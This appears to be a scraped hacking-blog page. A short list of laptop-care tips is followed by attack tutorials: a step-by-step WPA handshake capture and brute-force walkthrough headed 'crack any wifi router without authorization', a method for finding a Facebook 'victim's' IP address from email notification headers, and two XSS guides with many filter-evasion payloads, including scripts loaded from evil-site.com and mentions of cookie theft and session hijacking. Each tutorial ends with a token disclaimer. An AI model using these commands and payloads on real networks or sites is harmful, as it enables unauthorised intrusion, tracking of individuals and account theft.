10 Tips to Keep your Laptop Safe and Healthy Read more: http://www.callingallgeeks.org/10-tips-to-keep-your-laptop-safe-and-healthy/#ixzz2LS2a9ljg Under Creative Commons License: Attribution No Derivatives

1) Keep it clean – using proper cleaning products.  If you want it to last, your laptop needs to be a clean machine. But, don’t go overboard and use harsh cleaning products. Avoid using all-purpose household cleaners, or anything that contains acetone, ammonia, or alcohol.

2) Shut it down properly. If you just close your laptop, you’re not actually shutting it down properly.  All software programs, including your operating system need to be rebooted (restarted) from time to time. Doing this daily is a good practice to keep your computer running at peek performance.

3) Protect it with a case. Bumps and drops are inevitable. You can protect your computer from much (although certainly not all) of the damage caused by these accidents with a case. Cases also create personality, so be creative when you choose yours.

4) Clean up spills immediately. If you spill something on your computer, dry it up right away. I also purchased a plastic cover to protect the keyboard area of my laptop as this prevents spills from getting underneath the keys. Mashable recommends the “rice method” – plopping your computer in a bag of rice after a spill. If you live in a humid area like Florida, it is a good idea to dry out your computer from time to time.

5) Perform updates regularly. We’ve written about this before. It’s incredibly important to perform updates frequently. To learn more, check out: 

6) Don’t work with a cluttered desktop. Having too many files, etc. on your desktop can significantly reduce your computer’s performance.

7) When you install things, pay attention to the boxes you check. Often, you may be inadvertently adding other toolbars and “associated” programs. Avoiding these unwanted additions can be as simple as un-checking a box.

8) Find a decent anti-virus. Malwarebytes, WinAntiVirus, Trend Micro, and Panda are the picks of our development team. Visit those sites to give your computer a checkup.

9) Control the climate. Your laptop shouldn’t become too hot or too cold. One of the most frequent places with extreme climate is the trunk of your car – so avoid leaving your laptop there. If you must, always store it in a computer bag.

10) If you’re storing your computer for more than a few days, make sure you don’t have a full battery.  Chris Murtagh, our resident tech expert, says 50% power is ideal.

Read More

crack any wifi router without authorization

Don't crack any wifi router without authorization; otherwise, you will be put into the jail.

Step 1 :

airmon-ng

The result will be something like :


Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]

Step 2 :

airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Step 4 :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
 -w is the file to be written
--bssid is the BSSID

This terminal is keeping running.

Step 6 :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
-c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs
Step 8 (Optional) :

If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w - 
*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

Step a :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]


Step b :

airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step d :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step e :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
-c is the client MAC address (STATION)

Wait for the handshake.

Step g :

If the following programs are not yet installed, please do it.

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
Step i :

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install

Step j :

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) :

If you encounter error when reading the wpacrack-01.cap, you should do the following step.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l :

Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.

Remarks :

If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

To test if your wireless card (either USB or PCI-e) can do the injection or not :

airodump-ng mon0

Open another terminal.

aireplay-ng -9 mon0

Make sure pyrit workable on your system :

pyrit list_cores

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.

Read More

Trace someone in Facebook

Hello all my friends many people asking how to trace someone in Facebook , well some people think that the noob method with command prompt is the only method lol ^_^ closing all tabs and talking to the victim account then typing "netstat -n" no no i have found the method since 2011 and it's still working and private but i decided to share it.Anyway let me explain it !





This method work with Notification that you receive in your email for example if someone comment your status or send you a message on Facebook of course you will receive the notification in your email !




so you are A and your victim is B when your victim comment on your thread in Facebook in the system of Facebook it will say A <===========> B

so where to find your victim ip it's simple just go to your email and to the notification and view the source of the message type Ctrl +f then search this:


X-Facebook: from zuckmail
you will find a code like this ([MTI3LjAuMC4x]) it's coded in base 64 you have to decode to ASCII text then you will find the IP of your target Enj0y!

Tool to decode and encode =========>>> Go Here
for more information check the first line x-store-info:

Read More

Non Persistent Xss Attack

The non-persistent XSS are actually the most commons vulnerabilities that can be found on the Net.

It's commonly named as "non-persistent" because it works on an immediate HTTP response from the

 victim website: it show up when the webpage get the data provided by the attacker's client to

automatically generate a result page for the attackers himself. Standing on this the attacker could

provide some malicious code and try to make the server execute it in order to obtain some result.

The most common applying of this kind of vulnerability is in Search engines in website: the attacker

writes some arbitrary HTML code in the search textbox and, if the website 


is vulnerable, the result page will return the result of these HTML entities.

Simply put, cross site scripting involves the injection of malicious code into a website. It is the most
  
common method of attack at the moment, as most large sites will contain at least one XSS

vulnerability. However, there is more than one type of XSS. The most commonly found is referred to

as "non persistent" XSS. 

None Persistent XSS

Non persistent as the title suggests means that the injected script isn't permanent and just appears for

 the short time the user is viewing the page. The best example of this is a basic coded search engine

for a site. Say for example, the site search script is in this format:

Site.com/search.php?search=text here 

Once something has been searched for, the script may display on the page something along the lines

of:

"Results for text here"

Simply echoing your search string straight onto the page without performing any validation checks.

What if we were to alter the search string to display html of JavaScript? For example:

Site.com/search.php?search=<font color=red>XSS</font> 

Site.com/search.php?search=<script>alert("XSS");</script>

If no sanitation checks are being performed by the search script, this will just be echoed straight onto

the page, therefore displaying an alert or red text. If there was no limit to the size, this could be used

 to display anything you want. 

However, since the attacker can only display code on their own pages, this isn't much of a threat to

other users. Although if the string was turned into Hex the search string may be slightly more hidden

and with a little deception could be used to trick users into thinking the link is legitimate. 

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.

Read More

Persistent XSS Attack

The persistent XSS vulnerabilities are similar to the second type (Non-persistent XSS), because both

works on a victim site and tries to hack users informations and the difference is that in websites

vulnerables to Persistent XSS the attacker doesn't need to



provide the crafted url to the users, because the website itself permits to users to insert fixed data into

the system: this is the case for example of "guestbooks". Usually the users uses 


that kind of tool to leave messages to the owned 

of the website and at a first look it doesn't seems something dangerous, but if an 

attacker discover that the system is vulnerable can insert some malicious code in his

message and let ALL visitors to be victim of that.

This works when the tool provided (the guestbook in the example) doesn't do any 

check on the content of the inserted message: it just inserts the data provided from

the user into the result page.

Again as the name suggests, this is the type of XSS attack the attacker would want to get. Persistent

attacks are injected permanently into the code of the site, so anyone who views the site will be able

to

see permanently. In order for these to work, the code has to be made to store itself on the sites server

somehow, which can be hard to find. 

An embarrassing example of this was an XSS vulnerability discovered on this site by one of our users
 (fixed now, obviously) affecting the page all.php. The register process wasn't sanitized at all, so all a

 user had to do was simply register with a username containing HTML or JavaScript code. This was

an obvious vulnerability which should have been spotted from the beginning, but just like XSS on

other sites it was missed. If not fixed, this vulnerability would effect all.php as well as the forums and

 anywhere where the username was displayed on the site. A good place to look out for this

vulnerability is basic forum scripts that site owners have made themselves or found off sites

designed

to help novices. 

With both of these attacks, it is also possible to run malicious code from another site again making

the possibilities of attack endless. Javascript has a lot of features the are not well know, such as

changing the images on sites from images[number].src and anyone who uses myspace will know the

CSS can be used to remove or replace certain sections of a site based on name. If you have a

permanently vulnerable site, injecting code as simple as the one below will allow you to run XSS off

another site.

<SCRIPT SRC=http://evil-site.com/xss.js> </SCRIPT>

Getting Past Basic Protection ?

So what if a site owner knows about XSS, but has provided some but very little protection against it?

Well, this is where CharCode comes in. Char code is basically just a simple form of character

encoding that can encode blocked characters so they get past the protection but still get displayed

normally on the page. Here is a very common one that will pop up alerts saying "XSS" if it is

vulnerable.

';alert(String.fromCharCode(88,83,83))//\'; alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//\"; alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT> alert(String.fromCharCode(88,83,83))</SCRIPT>  

This is a very useful XSS to know, as it provides more than one type of attack at once. If you get

only

one or two alerts, you know that only one of two of them work, so you need to try to eliminate some

 of them to text which one is affecting the site. The CharCode for "X" is 88 and "S" is 83. As you can

 see, each provides a slight variation to try to beat character blocking. 

XSS could also be hidden in a none existent image. This code below would run malicious JavaScript

disguised as an image.

<img src="javascript:alert('XSS');">

What if quotes are blocked? No problem, just inject the site like so: 

<img src=javascript:alert(&quot;XSS&quot;)>

The &quot; will be interpreted in html as a " so the code will run fine. The next one below is very

likely to work if you find a site is vulnerable. 

<img src=javascript:alert(String.fromCharCode(88,83,83))>

 The XSS is hidden in image form and CharCode is being used to display the XSS vulnerability.

Now things get slightly more complicated as we enter ASCII and Unicode. Unicode is just a basic

code that was invented to allow all characters to be available to everyone e.g. for different languages

such as chinese character symbols. And ASCII has a similar purpose. You can go to 

Click Me to view the HTML code needed for ASCII code. This below shows the

whole code in ASCII form.

<img src=&#106;&#97;&#118;&#97;&#115;&#99; &#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101; &#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> 

 As you can tell, this will beat many filters as the code is basically unrecognisable. However, 

translating the code can display what it was designed to do. Next for Unicode, again this makes the 

 text unrecognisable but works the same.

<img src=&#0000106&#0000097&#0000118&#0000097 &#0000115&#0000099&#0000114&#0000105&#0000112 &#0000116&#0000058&#0000097&#0000108&#0000101 &#0000114&#0000116&#0000040&#0000039&#0000088 &#0000083&#0000083&#0000039&#0000041> 

 If the site has a limited amount of characters allowed, this probably won't be useful. As mentioned

previously, hex can also be used for XSS. The example below shows this. 

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69 &#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27 &#x58&#x53&#x53&#x27&#x29>

Again unrecognisable which makes it a great XSS to use.

The list of possible XSS attacks is endless and is far more than is covered here. With so many

ways to bypass security checks site owners have to work harder to try to protect their sites. As

well as web forms being used on most sites these days allowing users to enter code which will be

stored somewhere and inevitably viewed by someone else XSS can be used for almost anything.

With practise XSS can be used to run a hidden cookie stealer which a user will view and allow

you to steal their login info or if sessions are used perform "session hijacking" where you steal

their session data and again log in as them. To the simple defacement of a website through HTML

or Javascript. XSS is definitely an attack method which should be studied well as it provides such

a common method of attack.

As mentioned above, the list of possible XSS attacks is endless, there isn't enough room to

mention them here, but I will finish with some more XSS examples that may effect a vulnerable

site.

<IMG SRC="jav&#x0A;ascript:alert('XSS');"> - new line vulnerability 

 

<iframe src=http://evil-site.com/evil.html < - XSS using an iframe to display a whole new page

 

<SCRIPT>x=/XSS/ alert(x.source)</SCRIPT> - again beat checks using Javascript

 

<BODY BACKGROUND="javascript:alert('XSS')"> - infected body tag

 

<BGSOUND SRC="javascript:alert('XSS');">

 

<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> - stylesheet vulnerability

 

<IMG SRC='vbscript:msgbox("XSS")'> - vbscript, scripting language similar to javascript, again can help beat validation checks

 

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> - incorrectly parsed meta refresh

 

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

base64 encoding, another form of encryption, this one is less likely to work
.
<SCRIPT SRC="http://evil-site.com/xss.jpg"></SCRIPT> - very sneaky method, here you

rename

your .js to .jpg, but since you have the script tags it will still be read as a js file.

The list goes on and on, the best way is to just try them yourself. A lot of the time incorrectly

written HTML code will be the best method. If one way doesn't work, try adding an extra ">" or

"<" to the start or end of the code for example or view the source of the page for code tags you

need to close. Adding a "'>" to the end then starting your own malicious code. Well, that's the end

 of this tutorial. For more XSS attack example just use google as more of these are being though

up every day. Soon you should even be able to invent your own.

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.

Read More